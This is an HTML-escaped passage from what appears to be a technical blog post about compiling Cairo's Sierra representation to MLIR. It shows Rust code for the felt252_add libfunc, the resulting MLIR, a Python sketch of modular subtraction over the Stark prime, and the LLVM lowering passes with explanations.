&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_block: BlockRef&amp;lt;&amp;#39;ctx&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        storage: &amp;amp;mut Storage&amp;lt;&amp;#39;ctx&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) -&amp;gt; Result&amp;lt;()&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let id = func_decl.id.debug_name.as_ref().unwrap().to_string();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let sierra_felt_type = SierraType::Simple(self.felt_type());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let felt_type = sierra_felt_type.get_type();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let felt_type_location = sierra_felt_type.get_type_location(&amp;amp;self.context);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let region = Region::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;Block in which the calculation occurs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let entry_block = Block::new(&amp;amp;[felt_type_location, felt_type_location]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;Block for wrapping values &amp;gt;= PRIME&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let gte_prime_block = Block::new(&amp;amp;[]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;Block for returning values &amp;lt; PRIME&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let in_range_block = Block::new(&amp;amp;[]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; res = lhs + rhs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let lhs = entry_block.argument(0)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let rhs = entry_block.argument(1)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let res_op = self.op_add(&amp;amp;entry_block, lhs, rhs);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let res = res_op.result(0)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; gt_prime &amp;lt;=&amp;gt; res_result &amp;gt;= PRIME&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let prime_op = self.prime_constant(&amp;amp;entry_block);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let prime = prime_op.result(0)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let gte_prime_op = self.op_cmp(&amp;amp;entry_block, CmpOp::UnsignedGreaterThanEqual, res, prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let gte_prime = gte_prime_op.result(0)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; if gt_prime&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.op_cond_br(&amp;amp;entry_block, gte_prime, &amp;amp;gte_prime_block, &amp;amp;in_range_block, &amp;amp;[], &amp;amp;[]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; gt prime block&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let wrapped_res_op = self.op_sub(&amp;amp;gte_prime_block, res, prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let wrapped_res = wrapped_res_op.result(0)?.into();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.op_return(&amp;amp;gte_prime_block, &amp;amp;[wrapped_res]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; in range block&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.op_return(&amp;amp;in_range_block, &amp;amp;[res]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        region.append_block(entry_block);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        region.append_block(in_range_block);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        region.append_block(gte_prime_block);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let func = self.op_func(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;id,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;create_fn_signature(&amp;amp;[felt_type, felt_type], &amp;amp;[felt_type]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            vec![region],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            FnAttributes::libfunc(false, true),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        )?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_block.append_operation(func);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        storage.libfuncs.insert(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            id,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            SierraLibFunc::create_function_all_args(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                vec![sierra_felt_type.clone(), sierra_felt_type.clone()],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                vec![sierra_felt_type],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            ),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Ok(())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This is the MLIR corresponding to the felt252_add libfunc:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;func.func @felt252_add(%arg0: i256, %arg1: i256) -&amp;gt; i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage&amp;lt;internal&amp;gt;, passthrough = [&amp;quot;norecurse&amp;quot;, &amp;quot;alwaysinline&amp;quot;, &amp;quot;nounwind&amp;quot;]} {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %0 = arith.addi %arg0, %arg1 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %1 = arith.cmpi uge, %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cf.cond_br %1, ^bb2, ^bb1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb1:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %0 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb2:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %2 = arith.subi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %2 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As you can see, we have three basic blocks, and the last instruction of the first is a conditional jump.&lt;&#x2F;p&gt;
&lt;p&gt;This is the entire resulting MLIR before running the registered passes:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;module {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  func.func @felt252_add(%arg0: i256, %arg1: i256) -&amp;gt; i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage&amp;lt;internal&amp;gt;, passthrough = [&amp;quot;norecurse&amp;quot;, &amp;quot;alwaysinline&amp;quot;, &amp;quot;nounwind&amp;quot;]} {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %0 = arith.addi %arg0, %arg1 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %1 = arith.cmpi uge, %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cf.cond_br %1, ^bb2, ^bb1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb1:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %0 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb2:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %2 = arith.subi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %2 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  func.func @felt252_sub(%arg0: i256, %arg1: i256) -&amp;gt; i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage&amp;lt;internal&amp;gt;, passthrough = [&amp;quot;norecurse&amp;quot;, &amp;quot;alwaysinline&amp;quot;, &amp;quot;nounwind&amp;quot;]} {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %0 = arith.subi %arg0, %arg1 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c0_i256 = arith.constant 0 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %1 = arith.cmpi slt, %0, %c0_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cf.cond_br %1, ^bb2, ^bb1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb1:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %0 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb2:  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %2 = arith.addi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %2 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  func.func @&amp;quot;struct_construct&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;&amp;quot;(%arg0: i256, %arg1: i256) -&amp;gt; !llvm.struct&amp;lt;packed (i256, i256)&amp;gt; attributes {llvm.dso_local, llvm.linkage = #llvm.linkage&amp;lt;internal&amp;gt;, passthrough = [&amp;quot;norecurse&amp;quot;, &amp;quot;alwaysinline&amp;quot;, &amp;quot;nounwind&amp;quot;]} {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %0 = llvm.mlir.undef : !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %1 = llvm.insertvalue %arg0, %0[0] : !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %2 = llvm.insertvalue %arg1, %1[1] : !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %2 : !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  func.func @&amp;quot;simple::simple::something&amp;quot;(%arg0: i256) -&amp;gt; !llvm.struct&amp;lt;packed (i256, i256)&amp;gt; attributes {llvm.dso_local, llvm.emit_c_interface} {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cf.br ^bb1(%arg0 : i256)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ^bb1(%0: i256):  &#x2F;&#x2F; pred: ^bb0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c2_i256 = arith.constant 2 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %1 = call @felt252_add(%0, %c2_i256) : (i256, i256) -&amp;gt; i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %c2_i256_0 = arith.constant 2 : i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %2 = call @felt252_sub(%0, %c2_i256_0) : (i256, i256) -&amp;gt; i256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %3 = call @&amp;quot;struct_construct&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;&amp;quot;(%1, %2) : (i256, i256) -&amp;gt; !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return %3 : !llvm.struct&amp;lt;packed (i256, i256)&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
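The control flow in `@felt252_sub` above is just modular subtraction over the Stark field: subtract as plain integers and, if the result went negative, add the prime back. As a minimal sketch of the same logic in Python (the prime is copied verbatim from the `arith.constant` in the IR above):

```python
# Stark252 prime, copied from the arith.constant in the MLIR above.
P = 3618502788666131213697322783095070105623107215331596699973092056135872020481

def felt252_sub(a: int, b: int) -> int:
    """Mirror of @felt252_sub: ^bb1 returns the raw difference,
    ^bb2 adds the prime back when the difference is negative."""
    r = a - b          # arith.subi
    if r < 0:          # arith.cmpi slt + cf.cond_br
        r += P         # arith.addi in ^bb2
    return r

assert felt252_sub(5, 3) == 2
assert felt252_sub(0, 1) == P - 1
```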
&lt;p&gt;Great, so we have converted Sierra to MLIR using several built-in dialects and our own.&lt;br &#x2F;&gt;
To be able to run our code, we need to lower it to something that can be run.&lt;br &#x2F;&gt;
An excellent choice, for now, is LLVM IR since we want to run our Cairo code as native CPU instructions and can use the very solid LLVM infrastructure to compile LLVM IR to a binary object.&lt;br &#x2F;&gt;
We also want to leverage MLIR and LLVM’s pass manager infrastructure to take advantage of the optimizations it provides.&lt;&#x2F;p&gt;
&lt;p&gt;We create a pass manager and add the passes we want our code to go through:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let pass_manager = pass::Manager::new(&amp;amp;compiler.context);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    register_all_passes();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_func_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_scf_to_cf());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_cf_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_arithmetic_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_index_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_math_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_memref_to_llvm());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.add_pass(pass::conversion::convert_reconcile_unrealized_casts());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if optimized {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        pass_manager.add_pass(pass::transform::canonicalizer());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        pass_manager.add_pass(pass::transform::inliner());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        pass_manager.add_pass(pass::transform::symbol_dce());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        pass_manager.add_pass(pass::transform::cse());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        pass_manager.add_pass(pass::transform::sccp());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.enable_verifier(true);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pass_manager.run(&amp;amp;mut compiler.module)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let op = compiler.module.as_operation();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if op.verify() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if debug_info {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(op.debug_print())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(op.to_string())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Err(color_eyre::eyre::eyre!(&amp;quot;error verifying&amp;quot;))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;What do these passes do?&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * convert_func_to_llvm`: converts the `func`dialect, which contains operations surrounding high-order function abstractions, such as calls, to the`llvm` dialect, which maps LLVM IR into MLIR by defining the corresponding operations and types.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_scf_to_cf`: converts the `scf` (Structured Control Flow, with loops and ifs) dialect to the `cf` (Control Flow) dialect, replacing structured control flow with a CFG. In LLVM, you have to analyze branches to detect loops. SCF is at a higher abstraction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_cf_to_llvm`: converts the `cf` dialect to the `llvm` dialect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_arithmetic_to_llvm`: converts the `arith` dialect (which holds basic integer and floating point mathematical operations) to the `llvm` dialect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_math_to_llvm`: converts the `math` dialect (which holds mathematical operations on integer and floating types beyond simple arithmetics) to the `llvm` dialect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_index_to_llvm`: converts the `index` dialect (which contains operations for manipulating values of the built-in index type) to the `llvm` dialect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_memref_to_llvm`: converts the `memref` dialect (which holds core memref creation and manipulation ops not strongly associated with any particular other dialect or domain abstraction) to the `llvm` dialect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
